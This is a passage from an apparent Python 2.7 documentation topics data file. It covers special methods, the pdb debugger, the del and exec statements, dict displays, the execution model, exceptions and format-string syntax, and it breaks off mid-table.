Doing so\n means that not only will instances of the class raise an\n appropriate "TypeError" when a program attempts to retrieve their\n hash value, but they will also be correctly identified as\n unhashable when checking "isinstance(obj, collections.Hashable)"\n (unlike classes which define their own "__hash__()" to explicitly\n raise "TypeError").\n\n Changed in version 2.5: "__hash__()" may now also return a long\n integer object; the 32-bit integer is then derived from the hash of\n that object.\n\n Changed in version 2.6: "__hash__" may now be set to "None" to\n explicitly flag instances of a class as unhashable.\n\nobject.__nonzero__(self)\n\n Called to implement truth value testing and the built-in operation\n "bool()"; should return "False" or "True", or their integer\n equivalents "0" or "1". When this method is not defined,\n "__len__()" is called, if it is defined, and the object is\n considered true if its result is nonzero. If a class defines\n neither "__len__()" nor "__nonzero__()", all its instances are\n considered true.\n\nobject.__unicode__(self)\n\n Called to implement "unicode()" built-in; should return a Unicode\n object. When this method is not defined, string conversion is\n attempted, and the result of string conversion is converted to\n Unicode using the system default encoding.\n', 'debugger': u'\n"pdb" --- The Python Debugger\n*****************************\n\n**Source code:** Lib/pdb.py\n\n======================================================================\n\nThe module "pdb" defines an interactive source code debugger for\nPython programs. It supports setting (conditional) breakpoints and\nsingle stepping at the source line level, inspection of stack frames,\nsource code listing, and evaluation of arbitrary Python code in the\ncontext of any stack frame. It also supports post-mortem debugging\nand can be called under program control.\n\nThe debugger is extensible --- it is actually defined as the class\n"Pdb". This is currently undocumented but easily understood by reading\nthe source. The extension interface uses the modules "bdb" and "cmd".\n\nThe debugger\'s prompt is "(Pdb)". Typical usage to run a program under\ncontrol of the debugger is:\n\n >>> import pdb\n >>> import mymodule\n >>> pdb.run(\'mymodule.test()\')\n > <string>(0)?()\n (Pdb) continue\n > <string>(1)?()\n (Pdb) continue\n NameError: \'spam\'\n > <string>(1)?()\n (Pdb)\n\n"pdb.py" can also be invoked as a script to debug other scripts. For\nexample:\n\n python -m pdb myscript.py\n\nWhen invoked as a script, pdb will automatically enter post-mortem\ndebugging if the program being debugged exits abnormally. After post-\nmortem debugging (or after normal exit of the program), pdb will\nrestart the program. Automatic restarting preserves pdb\'s state (such\nas breakpoints) and in most cases is more useful than quitting the\ndebugger upon program\'s exit.\n\nNew in version 2.4: Restarting post-mortem behavior added.\n\nThe typical usage to break into the debugger from a running program is\nto insert\n\n import pdb; pdb.set_trace()\n\nat the location you want to break into the debugger. 
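For\nexample, a hypothetical script (the function name "divide" is\nillustrative):\n\n   def divide(a, b):\n       import pdb; pdb.set_trace()   # execution pauses here\n       return a / b\n\n   print divide(4, 2)\n\n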
You can then\nstep through the code following this statement, and continue running\nwithout the debugger using the "c" command.\n\nThe typical usage to inspect a crashed program is:\n\n >>> import pdb\n >>> import mymodule\n >>> mymodule.test()\n Traceback (most recent call last):\n File "<stdin>", line 1, in ?\n File "./mymodule.py", line 4, in test\n test2()\n File "./mymodule.py", line 3, in test2\n print spam\n NameError: spam\n >>> pdb.pm()\n > ./mymodule.py(3)test2()\n -> print spam\n (Pdb)\n\nThe module defines the following functions; each enters the debugger\nin a slightly different way:\n\npdb.run(statement[, globals[, locals]])\n\n Execute the *statement* (given as a string) under debugger control.\n The debugger prompt appears before any code is executed; you can\n set breakpoints and type "continue", or you can step through the\n statement using "step" or "next" (all these commands are explained\n below). The optional *globals* and *locals* arguments specify the\n environment in which the code is executed; by default the\n dictionary of the module "__main__" is used. (See the explanation\n of the "exec" statement or the "eval()" built-in function.)\n\npdb.runeval(expression[, globals[, locals]])\n\n Evaluate the *expression* (given as a string) under debugger\n control. When "runeval()" returns, it returns the value of the\n expression. Otherwise this function is similar to "run()".\n\npdb.runcall(function[, argument, ...])\n\n Call the *function* (a function or method object, not a string)\n with the given arguments. When "runcall()" returns, it returns\n whatever the function call returned. The debugger prompt appears\n as soon as the function is entered.\n\npdb.set_trace()\n\n Enter the debugger at the calling stack frame. This is useful to\n hard-code a breakpoint at a given point in a program, even if the\n code is not otherwise being debugged (e.g. when an assertion\n fails).\n\npdb.post_mortem([traceback])\n\n Enter post-mortem debugging of the given *traceback* object. If no\n *traceback* is given, it uses the one of the exception that is\n currently being handled (an exception must be being handled if the\n default is to be used).\n\npdb.pm()\n\n Enter post-mortem debugging of the traceback found in\n "sys.last_traceback".\n\nThe "run*" functions and "set_trace()" are aliases for instantiating\nthe "Pdb" class and calling the method of the same name. If you want\nto access further features, you have to do this yourself:\n\nclass pdb.Pdb(completekey=\'tab\', stdin=None, stdout=None, skip=None)\n\n "Pdb" is the debugger class.\n\n The *completekey*, *stdin* and *stdout* arguments are passed to the\n underlying "cmd.Cmd" class; see the description there.\n\n The *skip* argument, if given, must be an iterable of glob-style\n module name patterns. The debugger will not step into frames that\n originate in a module that matches one of these patterns. [1]\n\n Example call to enable tracing with *skip*:\n\n import pdb; pdb.Pdb(skip=[\'django.*\']).set_trace()\n\n New in version 2.7: The *skip* argument.\n\n run(statement[, globals[, locals]])\n runeval(expression[, globals[, locals]])\n runcall(function[, argument, ...])\n set_trace()\n\n See the documentation for the functions explained above.\n', 'del': u'\nThe "del" statement\n*******************\n\n del_stmt ::= "del" target_list\n\nDeletion is recursively defined very similar to the way assignment is\ndefined. 
Rather than spelling it out in full details, here are some\nhints.\n\nDeletion of a target list recursively deletes each target, from left\nto right.\n\nDeletion of a name removes the binding of that name from the local or\nglobal namespace, depending on whether the name occurs in a "global"\nstatement in the same code block. If the name is unbound, a\n"NameError" exception will be raised.\n\nIt is illegal to delete a name from the local namespace if it occurs\nas a free variable in a nested block.\n\nDeletion of attribute references, subscriptions and slicings is passed\nto the primary object involved; deletion of a slicing is in general\nequivalent to assignment of an empty slice of the right type (but even\nthis is determined by the sliced object).\n', 'dict': u'\nDictionary displays\n*******************\n\nA dictionary display is a possibly empty series of key/datum pairs\nenclosed in curly braces:\n\n dict_display ::= "{" [key_datum_list | dict_comprehension] "}"\n key_datum_list ::= key_datum ("," key_datum)* [","]\n key_datum ::= expression ":" expression\n dict_comprehension ::= expression ":" expression comp_for\n\nA dictionary display yields a new dictionary object.\n\nIf a comma-separated sequence of key/datum pairs is given, they are\nevaluated from left to right to define the entries of the dictionary:\neach key object is used as a key into the dictionary to store the\ncorresponding datum. This means that you can specify the same key\nmultiple times in the key/datum list, and the final dictionary\'s value\nfor that key will be the last one given.\n\nA dict comprehension, in contrast to list and set comprehensions,\nneeds two expressions separated with a colon followed by the usual\n"for" and "if" clauses. When the comprehension is run, the resulting\nkey and value elements are inserted in the new dictionary in the order\nthey are produced.\n\nRestrictions on the types of the key values are listed earlier in\nsection The standard type hierarchy. (To summarize, the key type\nshould be *hashable*, which excludes all mutable objects.) Clashes\nbetween duplicate keys are not detected; the last datum (textually\nrightmost in the display) stored for a given key value prevails.\n', 'dynamic-features': u'\nInteraction with dynamic features\n*********************************\n\nThere are several cases where Python statements are illegal when used\nin conjunction with nested scopes that contain free variables.\n\nIf a variable is referenced in an enclosing scope, it is illegal to\ndelete the name. An error will be reported at compile time.\n\nIf the wild card form of import --- "import *" --- is used in a\nfunction and the function contains or is a nested block with free\nvariables, the compiler will raise a "SyntaxError".\n\nIf "exec" is used in a function and the function contains or is a\nnested block with free variables, the compiler will raise a\n"SyntaxError" unless the exec explicitly specifies the local namespace\nfor the "exec". (In other words, "exec obj" would be illegal, but\n"exec obj in ns" would be legal.)\n\nThe "eval()", "execfile()", and "input()" functions and the "exec"\nstatement do not have access to the full environment for resolving\nnames. Names may be resolved in the local and global namespaces of\nthe caller. Free variables are not resolved in the nearest enclosing\nnamespace, but in the global namespace. [1] The "exec" statement and\nthe "eval()" and "execfile()" functions have optional arguments to\noverride the global and local namespace. 
If only one namespace is\nspecified, it is used for both.\n', 'else': u'\nThe "if" statement\n******************\n\nThe "if" statement is used for conditional execution:\n\n if_stmt ::= "if" expression ":" suite\n ( "elif" expression ":" suite )*\n ["else" ":" suite]\n\nIt selects exactly one of the suites by evaluating the expressions one\nby one until one is found to be true (see section Boolean operations\nfor the definition of true and false); then that suite is executed\n(and no other part of the "if" statement is executed or evaluated).\nIf all expressions are false, the suite of the "else" clause, if\npresent, is executed.\n', 'exceptions': u'\nExceptions\n**********\n\nExceptions are a means of breaking out of the normal flow of control\nof a code block in order to handle errors or other exceptional\nconditions. An exception is *raised* at the point where the error is\ndetected; it may be *handled* by the surrounding code block or by any\ncode block that directly or indirectly invoked the code block where\nthe error occurred.\n\nThe Python interpreter raises an exception when it detects a run-time\nerror (such as division by zero). A Python program can also\nexplicitly raise an exception with the "raise" statement. Exception\nhandlers are specified with the "try" ... "except" statement. The\n"finally" clause of such a statement can be used to specify cleanup\ncode which does not handle the exception, but is executed whether an\nexception occurred or not in the preceding code.\n\nPython uses the "termination" model of error handling: an exception\nhandler can find out what happened and continue execution at an outer\nlevel, but it cannot repair the cause of the error and retry the\nfailing operation (except by re-entering the offending piece of code\nfrom the top).\n\nWhen an exception is not handled at all, the interpreter terminates\nexecution of the program, or returns to its interactive main loop. In\neither case, it prints a stack backtrace, except when the exception is\n"SystemExit".\n\nExceptions are identified by class instances. The "except" clause is\nselected depending on the class of the instance: it must reference the\nclass of the instance or a base class thereof. The instance can be\nreceived by the handler and can carry additional information about the\nexceptional condition.\n\nExceptions can also be identified by strings, in which case the\n"except" clause is selected by object identity. An arbitrary value\ncan be raised along with the identifying string which can be passed to\nthe handler.\n\nNote: Messages to exceptions are not part of the Python API. Their\n contents may change from one version of Python to the next without\n warning and should not be relied on by code which will run under\n multiple versions of the interpreter.\n\nSee also the description of the "try" statement in section The try\nstatement and "raise" statement in section The raise statement.\n\n-[ Footnotes ]-\n\n[1] This limitation occurs because the code that is executed by\n these operations is not available at the time the module is\n compiled.\n', 'exec': u'\nThe "exec" statement\n********************\n\n exec_stmt ::= "exec" or_expr ["in" expression ["," expression]]\n\nThis statement supports dynamic execution of Python code. The first\nexpression should evaluate to either a Unicode string, a *Latin-1*\nencoded string, an open file object, a code object, or a tuple. 
If it\nis a string, the string is parsed as a suite of Python statements\nwhich is then executed (unless a syntax error occurs). [1] If it is an\nopen file, the file is parsed until EOF and executed. If it is a code\nobject, it is simply executed. For the interpretation of a tuple, see\nbelow. In all cases, the code that\'s executed is expected to be valid\nas file input (see section File input). Be aware that the "return"\nand "yield" statements may not be used outside of function definitions\neven within the context of code passed to the "exec" statement.\n\nIn all cases, if the optional parts are omitted, the code is executed\nin the current scope. If only the first expression after "in" is\nspecified, it should be a dictionary, which will be used for both the\nglobal and the local variables. If two expressions are given, they\nare used for the global and local variables, respectively. If\nprovided, *locals* can be any mapping object. Remember that at module\nlevel, globals and locals are the same dictionary. If two separate\nobjects are given as *globals* and *locals*, the code will be executed\nas if it were embedded in a class definition.\n\nThe first expression may also be a tuple of length 2 or 3. In this\ncase, the optional parts must be omitted. The form "exec(expr,\nglobals)" is equivalent to "exec expr in globals", while the form\n"exec(expr, globals, locals)" is equivalent to "exec expr in globals,\nlocals". The tuple form of "exec" provides compatibility with Python\n3, where "exec" is a function rather than a statement.\n\nChanged in version 2.4: Formerly, *locals* was required to be a\ndictionary.\n\nAs a side effect, an implementation may insert additional keys into\nthe dictionaries given besides those corresponding to variable names\nset by the executed code. For example, the current implementation may\nadd a reference to the dictionary of the built-in module "__builtin__"\nunder the key "__builtins__" (!).\n\n**Programmer\'s hints:** dynamic evaluation of expressions is supported\nby the built-in function "eval()". The built-in functions "globals()"\nand "locals()" return the current global and local dictionary,\nrespectively, which may be useful to pass around for use by "exec".\n\n-[ Footnotes ]-\n\n[1] Note that the parser only accepts the Unix-style end of line\n convention. If you are reading the code from a file, make sure to\n use *universal newlines* mode to convert Windows or Mac-style\n newlines.\n', 'execmodel': u'\nExecution model\n***************\n\n\nNaming and binding\n==================\n\n*Names* refer to objects. Names are introduced by name binding\noperations. Each occurrence of a name in the program text refers to\nthe *binding* of that name established in the innermost function block\ncontaining the use.\n\nA *block* is a piece of Python program text that is executed as a\nunit. The following are blocks: a module, a function body, and a class\ndefinition. Each command typed interactively is a block. A script\nfile (a file given as standard input to the interpreter or specified\non the interpreter command line as the first argument) is a code block.\nA script command (a command specified on the interpreter command line\nwith the \'**-c**\' option) is a code block. The file read by the\nbuilt-in function "execfile()" is a code block. The string argument\npassed to the built-in function "eval()" and to the "exec" statement\nis a code block. 
The expression read and evaluated by the built-in\nfunction "input()" is a code block.\n\nA code block is executed in an *execution frame*. A frame contains\nsome administrative information (used for debugging) and determines\nwhere and how execution continues after the code block\'s execution has\ncompleted.\n\nA *scope* defines the visibility of a name within a block. If a local\nvariable is defined in a block, its scope includes that block. If the\ndefinition occurs in a function block, the scope extends to any blocks\ncontained within the defining one, unless a contained block introduces\na different binding for the name. The scope of names defined in a\nclass block is limited to the class block; it does not extend to the\ncode blocks of methods -- this includes generator expressions since\nthey are implemented using a function scope. This means that the\nfollowing will fail:\n\n class A:\n a = 42\n b = list(a + i for i in range(10))\n\nWhen a name is used in a code block, it is resolved using the nearest\nenclosing scope. The set of all such scopes visible to a code block\nis called the block\'s *environment*.\n\nIf a name is bound in a block, it is a local variable of that block.\nIf a name is bound at the module level, it is a global variable. (The\nvariables of the module code block are local and global.) If a\nvariable is used in a code block but not defined there, it is a *free\nvariable*.\n\nWhen a name is not found at all, a "NameError" exception is raised.\nIf the name refers to a local variable that has not been bound, a\n"UnboundLocalError" exception is raised. "UnboundLocalError" is a\nsubclass of "NameError".\n\nThe following constructs bind names: formal parameters to functions,\n"import" statements, class and function definitions (these bind the\nclass or function name in the defining block), and targets that are\nidentifiers if occurring in an assignment, "for" loop header, in the\nsecond position of an "except" clause header or after "as" in a "with"\nstatement. The "import" statement of the form "from ... import *"\nbinds all names defined in the imported module, except those beginning\nwith an underscore. This form may only be used at the module level.\n\nA target occurring in a "del" statement is also considered bound for\nthis purpose (though the actual semantics are to unbind the name). It\nis illegal to unbind a name that is referenced by an enclosing scope;\nthe compiler will report a "SyntaxError".\n\nEach assignment or import statement occurs within a block defined by a\nclass or function definition or at the module level (the top-level\ncode block).\n\nIf a name binding operation occurs anywhere within a code block, all\nuses of the name within the block are treated as references to the\ncurrent block. This can lead to errors when a name is used within a\nblock before it is bound. This rule is subtle. Python lacks\ndeclarations and allows name binding operations to occur anywhere\nwithin a code block. The local variables of a code block can be\ndetermined by scanning the entire text of the block for name binding\noperations.\n\nIf the global statement occurs within a block, all uses of the name\nspecified in the statement refer to the binding of that name in the\ntop-level namespace. Names are resolved in the top-level namespace by\nsearching the global namespace, i.e. the namespace of the module\ncontaining the code block, and the builtins namespace, the namespace\nof the module "__builtin__". 
The global namespace is searched first.\nIf the name is not found there, the builtins namespace is searched.\nThe global statement must precede all uses of the name.\n\nThe builtins namespace associated with the execution of a code block\nis actually found by looking up the name "__builtins__" in its global\nnamespace; this should be a dictionary or a module (in the latter case\nthe module\'s dictionary is used). By default, when in the "__main__"\nmodule, "__builtins__" is the built-in module "__builtin__" (note: no\n\'s\'); when in any other module, "__builtins__" is an alias for the\ndictionary of the "__builtin__" module itself. "__builtins__" can be\nset to a user-created dictionary to create a weak form of restricted\nexecution.\n\n**CPython implementation detail:** Users should not touch\n"__builtins__"; it is strictly an implementation detail. Users\nwanting to override values in the builtins namespace should "import"\nthe "__builtin__" (no \'s\') module and modify its attributes\nappropriately.\n\nThe namespace for a module is automatically created the first time a\nmodule is imported. The main module for a script is always called\n"__main__".\n\nThe "global" statement has the same scope as a name binding operation\nin the same block. If the nearest enclosing scope for a free variable\ncontains a global statement, the free variable is treated as a global.\n\nA class definition is an executable statement that may use and define\nnames. These references follow the normal rules for name resolution.\nThe namespace of the class definition becomes the attribute dictionary\nof the class. Names defined at the class scope are not visible in\nmethods.\n\n\nInteraction with dynamic features\n---------------------------------\n\nThere are several cases where Python statements are illegal when used\nin conjunction with nested scopes that contain free variables.\n\nIf a variable is referenced in an enclosing scope, it is illegal to\ndelete the name. An error will be reported at compile time.\n\nIf the wild card form of import --- "import *" --- is used in a\nfunction and the function contains or is a nested block with free\nvariables, the compiler will raise a "SyntaxError".\n\nIf "exec" is used in a function and the function contains or is a\nnested block with free variables, the compiler will raise a\n"SyntaxError" unless the exec explicitly specifies the local namespace\nfor the "exec". (In other words, "exec obj" would be illegal, but\n"exec obj in ns" would be legal.)\n\nThe "eval()", "execfile()", and "input()" functions and the "exec"\nstatement do not have access to the full environment for resolving\nnames. Names may be resolved in the local and global namespaces of\nthe caller. Free variables are not resolved in the nearest enclosing\nnamespace, but in the global namespace. [1] The "exec" statement and\nthe "eval()" and "execfile()" functions have optional arguments to\noverride the global and local namespace. If only one namespace is\nspecified, it is used for both.\n\n\nExceptions\n==========\n\nExceptions are a means of breaking out of the normal flow of control\nof a code block in order to handle errors or other exceptional\nconditions. An exception is *raised* at the point where the error is\ndetected; it may be *handled* by the surrounding code block or by any\ncode block that directly or indirectly invoked the code block where\nthe error occurred.\n\nThe Python interpreter raises an exception when it detects a run-time\nerror (such as division by zero). 
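A minimal sketch of\nhandling such an error:\n\n   try:\n       result = 1 / 0\n   except ZeroDivisionError:\n       result = float(\'inf\')   # recover and carry on\n\n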
A Python program can also\nexplicitly raise an exception with the "raise" statement. Exception\nhandlers are specified with the "try" ... "except" statement. The\n"finally" clause of such a statement can be used to specify cleanup\ncode which does not handle the exception, but is executed whether an\nexception occurred or not in the preceding code.\n\nPython uses the "termination" model of error handling: an exception\nhandler can find out what happened and continue execution at an outer\nlevel, but it cannot repair the cause of the error and retry the\nfailing operation (except by re-entering the offending piece of code\nfrom the top).\n\nWhen an exception is not handled at all, the interpreter terminates\nexecution of the program, or returns to its interactive main loop. In\neither case, it prints a stack backtrace, except when the exception is\n"SystemExit".\n\nExceptions are identified by class instances. The "except" clause is\nselected depending on the class of the instance: it must reference the\nclass of the instance or a base class thereof. The instance can be\nreceived by the handler and can carry additional information about the\nexceptional condition.\n\nExceptions can also be identified by strings, in which case the\n"except" clause is selected by object identity. An arbitrary value\ncan be raised along with the identifying string which can be passed to\nthe handler.\n\nNote: Messages to exceptions are not part of the Python API. Their\n contents may change from one version of Python to the next without\n warning and should not be relied on by code which will run under\n multiple versions of the interpreter.\n\nSee also the description of the "try" statement in section The try\nstatement and "raise" statement in section The raise statement.\n\n-[ Footnotes ]-\n\n[1] This limitation occurs because the code that is executed by\n these operations is not available at the time the module is\n compiled.\n', 'exprlists': u'\nExpression lists\n****************\n\n expression_list ::= expression ( "," expression )* [","]\n\nAn expression list containing at least one comma yields a tuple. The\nlength of the tuple is the number of expressions in the list. The\nexpressions are evaluated from left to right.\n\nThe trailing comma is required only to create a single tuple (a.k.a. a\n*singleton*); it is optional in all other cases. A single expression\nwithout a trailing comma doesn\'t create a tuple, but rather yields the\nvalue of that expression. (To create an empty tuple, use an empty pair\nof parentheses: "()".)\n', 'floating': u'\nFloating point literals\n***********************\n\nFloating point literals are described by the following lexical\ndefinitions:\n\n floatnumber ::= pointfloat | exponentfloat\n pointfloat ::= [intpart] fraction | intpart "."\n exponentfloat ::= (intpart | pointfloat) exponent\n intpart ::= digit+\n fraction ::= "." digit+\n exponent ::= ("e" | "E") ["+" | "-"] digit+\n\nNote that the integer and exponent parts of floating point numbers can\nlook like octal integers, but are interpreted using radix 10. For\nexample, "077e010" is legal, and denotes the same number as "77e10".\nThe allowed range of floating point literals is implementation-\ndependent. Some examples of floating point literals:\n\n 3.14 10. 
.001 1e100 3.14e-10 0e0\n\nNote that numeric literals do not include a sign; a phrase like "-1"\nis actually an expression composed of the unary operator "-" and the\nliteral "1".\n', 'for': u'\nThe "for" statement\n*******************\n\nThe "for" statement is used to iterate over the elements of a sequence\n(such as a string, tuple or list) or other iterable object:\n\n for_stmt ::= "for" target_list "in" expression_list ":" suite\n ["else" ":" suite]\n\nThe expression list is evaluated once; it should yield an iterable\nobject. An iterator is created for the result of the\n"expression_list". The suite is then executed once for each item\nprovided by the iterator, in the order of ascending indices. Each\nitem in turn is assigned to the target list using the standard rules\nfor assignments, and then the suite is executed. When the items are\nexhausted (which is immediately when the sequence is empty), the suite\nin the "else" clause, if present, is executed, and the loop\nterminates.\n\nA "break" statement executed in the first suite terminates the loop\nwithout executing the "else" clause\'s suite. A "continue" statement\nexecuted in the first suite skips the rest of the suite and continues\nwith the next item, or with the "else" clause if there was no next\nitem.\n\nThe suite may assign to the variable(s) in the target list; this does\nnot affect the next item assigned to it.\n\nThe target list is not deleted when the loop is finished, but if the\nsequence is empty, it will not have been assigned to at all by the\nloop. Hint: the built-in function "range()" returns a sequence of\nintegers suitable to emulate the effect of Pascal\'s "for i := a to b\ndo"; e.g., "range(3)" returns the list "[0, 1, 2]".\n\nNote: There is a subtlety when the sequence is being modified by the\n loop (this can only occur for mutable sequences, i.e. lists). An\n internal counter is used to keep track of which item is used next,\n and this is incremented on each iteration. When this counter has\n reached the length of the sequence the loop terminates. This means\n that if the suite deletes the current (or a previous) item from the\n sequence, the next item will be skipped (since it gets the index of\n the current item which has already been treated). Likewise, if the\n suite inserts an item in the sequence before the current item, the\n current item will be treated again the next time through the loop.\n This can lead to nasty bugs that can be avoided by making a\n temporary copy using a slice of the whole sequence, e.g.,\n\n for x in a[:]:\n if x < 0: a.remove(x)\n', 'formatstrings': u'\nFormat String Syntax\n********************\n\nThe "str.format()" method and the "Formatter" class share the same\nsyntax for format strings (although in the case of "Formatter",\nsubclasses can define their own format string syntax).\n\nFormat strings contain "replacement fields" surrounded by curly braces\n"{}". Anything that is not contained in braces is considered literal\ntext, which is copied unchanged to the output. If you need to include\na brace character in the literal text, it can be escaped by doubling:\n"{{" and "}}".\n\nThe grammar for a replacement field is as follows:\n\n replacement_field ::= "{" [field_name] ["!" conversion] [":" format_spec] "}"\n field_name ::= arg_name ("." 
attribute_name | "[" element_index "]")*\n arg_name ::= [identifier | integer]\n attribute_name ::= identifier\n element_index ::= integer | index_string\n index_string ::= <any source character except "]"> +\n conversion ::= "r" | "s"\n format_spec ::= <described in the next section>\n\nIn less formal terms, the replacement field can start with a\n*field_name* that specifies the object whose value is to be formatted\nand inserted into the output instead of the replacement field. The\n*field_name* is optionally followed by a *conversion* field, which is\npreceded by an exclamation point "\'!\'", and a *format_spec*, which is\npreceded by a colon "\':\'". These specify a non-default format for the\nreplacement value.\n\nSee also the Format Specification Mini-Language section.\n\nThe *field_name* itself begins with an *arg_name* that is either a\nnumber or a keyword. If it\'s a number, it refers to a positional\nargument, and if it\'s a keyword, it refers to a named keyword\nargument. If the numerical arg_names in a format string are 0, 1, 2,\n... in sequence, they can all be omitted (not just some) and the\nnumbers 0, 1, 2, ... will be automatically inserted in that order.\nBecause *arg_name* is not quote-delimited, it is not possible to\nspecify arbitrary dictionary keys (e.g., the strings "\'10\'" or\n"\':-]\'") within a format string. The *arg_name* can be followed by any\nnumber of index or attribute expressions. An expression of the form\n"\'.name\'" selects the named attribute using "getattr()", while an\nexpression of the form "\'[index]\'" does an index lookup using\n"__getitem__()".\n\nChanged in version 2.7: The positional argument specifiers can be\nomitted, so "\'{} {}\'" is equivalent to "\'{0} {1}\'".\n\nSome simple format string examples:\n\n "First, thou shalt count to {0}" # References first positional argument\n "Bring me a {}" # Implicitly references the first positional argument\n "From {} to {}" # Same as "From {0} to {1}"\n "My quest is {name}" # References keyword argument \'name\'\n "Weight in tons {0.weight}" # \'weight\' attribute of first positional arg\n "Units destroyed: {players[0]}" # First element of keyword argument \'players\'.\n\nThe *conversion* field causes a type coercion before formatting.\nNormally, the job of formatting a value is done by the "__format__()"\nmethod of the value itself. However, in some cases it is desirable to\nforce a type to be formatted as a string, overriding its own\ndefinition of formatting. By converting the value to a string before\ncalling "__format__()", the normal formatting logic is bypassed.\n\nTwo conversion flags are currently supported: "\'!s\'" which calls\n"str()" on the value, and "\'!r\'" which calls "repr()".\n\nSome examples:\n\n "Harold\'s a clever {0!s}" # Calls str() on the argument first\n "Bring out the holy {name!r}" # Calls repr() on the argument first\n\nThe *format_spec* field contains a specification of how the value\nshould be presented, including such details as field width, alignment,\npadding, decimal precision and so on. Each value type can define its\nown "formatting mini-language" or interpretation of the *format_spec*.\n\nMost built-in types support a common formatting mini-language, which\nis described in the next section.\n\nA *format_spec* field can also include nested replacement fields\nwithin it. These nested replacement fields can contain only a field\nname; conversion flags and format specifications are not allowed. 
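For\ninstance, a width supplied at run time (the values are\nillustrative):\n\n   >>> \'{0:{1}}\'.format(\'x\', 4)\n   \'x   \'\n\n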
The\nreplacement fields within the format_spec are substituted before the\n*format_spec* string is interpreted. This allows the formatting of a\nvalue to be dynamically specified.\n\nSee the Format examples section for some examples.\n\n\nFormat Specification Mini-Language\n==================================\n\n"Format specifications" are used within replacement fields contained\nwithin a format string to define how individual values are presented\n(see Format String Syntax). They can also be passed directly to the\nbuilt-in "format()" function. Each formattable type may define how\nthe format specification is to be interpreted.\n\nMost built-in types implement the following options for format\nspecifications, although some of the formatting options are only\nsupported by the numeric types.\n\nA general convention is that an empty format string ("""") produces\nthe same result as if you had called "str()" on the value. A non-empty\nformat string typically modifies the result.\n\nThe general form of a *standard format specifier* is:\n\n format_spec ::= [[fill]align][sign][#][0][width][,][.precision][type]\n fill ::= <any character>\n align ::= "<" | ">" | "=" | "^"\n sign ::= "+" | "-" | " "\n width ::= integer\n precision ::= integer\n type ::= "b" | "c" | "d" | "e" | "E" | "f" | "F" | "g" | "G" | "n" | "o" | "s" | "x" | "X" | "%"\n\nIf a valid *align* value is specified, it can be preceded by a *fill*\ncharacter that can be any character and defaults to a space if\nomitted. Note that it is not possible to use "{" and "}" as *fill*\nchar while using the "str.format()" method; this limitation however\ndoesn\'t affect the "format()" function.\n\nThe meaning of the various alignment options is as follows:\n\n +-----------+------------------------------------------------------------+\n | Option | Meaning |\n +===========+============================================================+\n | "\'<\'" | Forces the field to be left-aligned within the available |\n | | space (this is the default for most objects). |\n +-----------+------------------------------------------------------------+\n | "\'>\'" | Forces the field to be right-aligned within the available |\n | | space (this is the default for numbers). |\n +-----------+------------------------------------------------------------+\n | "\'=\'" | Forces the padding to be placed after the sign (if any) |\n | | but before the digits. This is used for printing fields |\n | | in the form \'+000000120\'. This alignment option is only |\n | | valid for numeric types. |\n +-----------+------------------------------------------------------------+\n | "\'^\'" | Forces the field to be centered within the available |\n | | space. |\n +-----------+------------------------------------------------------------+\n\nNote that unless a minimum field width is defined, the field width\nwill always be the same size as the data to fill it, so that the\nalignment option has no meaning in this case.\n\nThe *sign* option is only valid for number types, and can be one of\nthe following:\n\n +-----------+------------------------------------------------------------+\n | Option | Meaning |\n +===========+============================================================+\n | "\'+\'" | indicates that a sign should be used for both positive as |\n | | well as negative numbers. |\n +-----------+------------------------------------------------------------+\n | "\'-\'" | indicates that a sign should be used only for negative |\n | | numbers (this is the default behavior). 
|\n +-----------+------------------------------------------------------------+\n | space | indicates that a leading space should be used on positive |\n | | numbers, and a minus sign on negative numbers. |\n +-----------+------------------------------------------------------------+\n\nThe "\'#\'" option is only valid for integers, and only for binary,\noctal, or hexadecimal output. If present, it specifies that the\noutput will be prefixed by "\'0b\'", "\'0o\'", or "\'0x\'", respectively.\n\nThe "\',\'" option signals the use of a comma for a thousands separator.\nFor a locale aware separator, use the "\'n\'" integer presentation type\ninstead.\n\nChanged in version 2.7: Added the "\',\'" option (see also **PEP 378**).\n\n*width* is a decimal integer defining the minimum field width. If not\nspecified, then the field width will be determined by the content.\n\nPreceding the *width* field by a zero ("\'0\'") character enables sign-\naware zero-padding for numeric types. This is equivalent to a *fill*\ncharacter of "\'0\'" with an *alignment* type of "\'=\'".\n\nThe *precision* is a decimal number indicating how many digits should\nbe displayed after the decimal point for a floating point value\nformatted with "\'f\'" and "\'F\'", or before and after the decimal point\nfor a floating point value formatted with "\'g\'" or "\'G\'". For non-\nnumber types the field indicates the maximum field size - in other\nwords, how many characters will be used from the field content. The\n*precision* is not allowed for integer values.\n\nFinally, the *type* determines how the data should be presented.\n\nThe available string presentation types are:\n\n +-----------+------------------------------------------------------------+\n | Type | Meaning |\n +===========+============================================================+\n | "\'s\'" | String format. This is the default type for strings and |\n | | may be omitted. |\n +-----------+------------------------------------------------------------+\n | None | The same as "\'s\'". |\n +-----------+------------------------------------------------------------+\n\nThe available integer presentation types are:\n\n +-----------+------------------------------------------------------------+\n | Type | Meaning |\n +===========+============================================================+\n | "\'b\'" | Binary format. Outputs the number in base 2. |\n +-----------+------------------------------------------------------------+\n | "\'c\'" | Character. Converts the integer to the corresponding |\n | | unicode character before printing. |\n +-----------+------------------------------------------------------------+\n | "\'d\'" | Decimal Integer. Outputs the number in base 10. |\n +-----------+------------------------------------------------------------+\n | "\'o\'" | Octal format. Outputs the number in base 8. |\n +-----------+------------------------------------------------------------+\n | "\'x\'" | Hex format. Outputs the number in base 16, using lower- |\n | | case letters for the digits above 9. |\n +-----------+------------------------------------------------------------+\n | "\'X\'" | Hex format. Outputs the number in base 16, using upper- |\n | | case letters for the digits above 9. |\n +-----------+------------------------------------------------------------+\n | "\'n\'" | Number. This is the same as "\'d\'", except that it uses the |\n | | current locale setting to insert the appropriate number |\n | | separator characters. 
|\n +-----------+------------------------------------------------------------+\n | None | The same as "\'d\'". |\n +-----------+------------------------------------------------------------+\n\nIn addition to the above presentation types, integers can be formatted\nwith the floating point presentation types listed below (except "\'n\'"\nand None). When doing so, "float()" is used to convert the integer to\na floating point number before formatting.\n\nThe available presentation types for floating point and decimal values\nare:\n\n +-----------+------------------------------------------------------------+\n | Type | Meaning |\n +===========+============================================================+\n | "\'e\'" | Exponent notation. Prints the number in scientific |\n | | notation using the letter \'e\' to indicate the exponent. |\n | | The default precision is "6". |\n +-----------+------------------------------------------------------------+\n | "\'E\'" | Exponent notation. Same as "\'e\'" except it uses an upper |\n | | case \'E\' as the separator character. |\n +-----------+------------------------------------------------------------+\n | "\'f\'" | Fixed point. Displays the number as a fixed-point number. |\n | | The default precision is "6". |\n +-----------+------------------------------------------------------------+\n | "\'F\'" | Fixed point. Same as 